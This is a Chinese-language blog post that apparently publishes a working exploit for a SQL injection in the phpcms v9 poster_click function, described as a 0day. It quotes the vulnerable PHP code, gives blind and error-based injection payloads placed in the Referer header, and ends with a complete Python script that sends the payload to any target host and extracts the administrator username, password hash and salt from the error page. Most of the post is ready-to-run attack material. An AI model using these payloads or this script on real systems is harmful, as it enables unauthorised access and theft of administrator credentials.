漏洞利用：phpcms post_click注入0day利用代码 |

发表评论
891 次浏览

A+

显示不全请点击全屏阅读

有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:

问题函数\phpcms\modules\poster\index.php

public function poster_click() {
$id = isset($_GET[‘id’]) ? intval($_GET[‘id’]) : 0;
$r = $this->db->get_one(array(‘id’=>$id));
if (!is_array($r) && empty($r)) return false;
$ip_area = pc_base::load_sys_class(‘ip_area’);
$ip = ip();
$area = $ip_area->get($ip);
$username = param::get_cookie(‘username’) ? param::get_cookie(‘username’) : ”;
if($id) {
$siteid = isset($_GET[‘siteid’]) ? intval($_GET[‘siteid’]) : get_siteid();
$this->s_db->insert(array(‘siteid’=>$siteid, ‘pid’=>$id, ‘username’=>$username, ‘area’=>$area, ‘ip’=>$ip, ‘referer’=>HTTP_REFERER, ‘clicktime’=>SYS_TIME, ‘type’=> 1));
}
$this->db->update(array(‘clicks’=>’+=1’), array(‘id’=>$id));
$setting = string2array($r[‘setting’]);
if (count($setting)==1) {
$url = $setting[‘1’][‘linkurl’];
} else {
$url = isset($_GET[‘url’]) ? $_GET[‘url’] : $setting[‘1’][‘linkurl’];
}
header(‘Location: ‘.$url);
}

利用方式：

1、可以采用盲注入的手法：

referer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#

通过返回页面，正常与否一个个猜解密码字段。

2、代码是花开写的，随手附上了：

1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#

此方法是爆错注入手法，原理自查。

利用程序:

#!/usr/bin/env python
import httplib,sys,re

def attack():
print “Code by Pax.Mac Team conqu3r!”
print “Welcome to our zone!!!”
url=sys.argv[1]
paths=sys.argv[2]
conn = httplib.HTTPConnection(url)
i_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,
“Accept”: “text/plain”,
“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}
conn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)
r1 = conn.getresponse()
datas=r1.read()
datas=re.findall(r”Duplicate entry \’\w+’”, datas)
print datas[0]
conn.close()
if __name__==”__main__”:
if len(sys.argv)<3:
print “Code by Pax.Mac Team conqu3r”
print “Usgae:”
print “ phpcmsattack.py www.paxmac.org /”
print “ phpcmsataack.py www.paxmac.org /phpcmsv9/”
sys.exit(1)
attack()